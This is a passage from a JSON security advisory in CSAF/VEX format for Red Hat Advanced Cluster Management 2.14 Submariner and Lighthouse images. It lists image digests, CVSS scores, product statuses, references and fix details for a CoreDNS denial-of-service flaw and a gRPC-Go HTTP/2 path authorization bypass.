"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "github.com/coredns/coredns: CoreDNS: Denial of Service via oversized DNS-over-HTTPS GET requests"
},
{
"cve": "CVE-2026-33186",
"cwe": {
"id": "CWE-551",
"name": "Incorrect Behavior Order: Authorization Before Parsing and Canonicalization"
},
"discovery_date": "2026-03-20T23:02:27.802640+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2449833"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in gRPC-Go, the Go language implementation of gRPC. This vulnerability, an authorization bypass, is caused by improper input validation of the HTTP/2 `:path` pseudo-header. A remote attacker can exploit this by sending raw HTTP/2 frames with a malformed `:path` that omits the mandatory leading slash. This allows the attacker to bypass defined security policies, potentially leading to unauthorized access to services or information disclosure.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "google.golang.org/grpc/grpc-go: google.golang.org/grpc/authz: gRPC-Go: Authorization bypass due to improper HTTP/2 path validation",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64"
],
"known_not_affected": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-33186"
},
{
"category": "external",
"summary": "RHBZ#2449833",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449833"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-33186",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33186"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-33186",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33186"
},
{
"category": "external",
"summary": "https://github.com/grpc/grpc-go/security/advisories/GHSA-p77j-4mvh-x3m3",
"url": "https://github.com/grpc/grpc-go/security/advisories/GHSA-p77j-4mvh-x3m3"
}
],
"release_date": "2026-03-20T22:23:32.147000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-10T20:51:55+00:00",
"details": "For release note details, see the upstream Submariner release notes:\n\nhttps://submariner.io/community/releases/\n\nDownstream-specific issues resolved:\n* ACM-27238\n* ACM-28294\n* ACM-28295\n* ACM-28311\n* ACM-28313\n* ACM-28314\n* ACM-28315\n* ACM-28316\n* ACM-28329\n* ACM-28331\n* ACM-28333\n* ACM-28335\n* ACM-28337\n* ACM-28339\n* ACM-28342\n* ACM-29317\n* ACM-29511\n* ACM-29613\n* ACM-29614\n* ACM-29631\n* ACM-29632\n* ACM-29633\n* ACM-29634\n* ACM-29776\n* ACM-30134\n* ACM-30726\n* ACM-30727\n* ACM-30728\n* ACM-30729\n* ACM-30970\n* ACM-31136\n* ACM-31831\n* ACM-31840\n* ACM-32575\n* ACM-32842\n* ACM-34108\n* ACM-34586\n* ACM-34589\n\nFor more details, see the Red Hat Advanced Cluster Management for Kubernetes documentation:\n\nhttps://docs.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.14/",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64"
],
"restart_required": {
"category": "none"
},
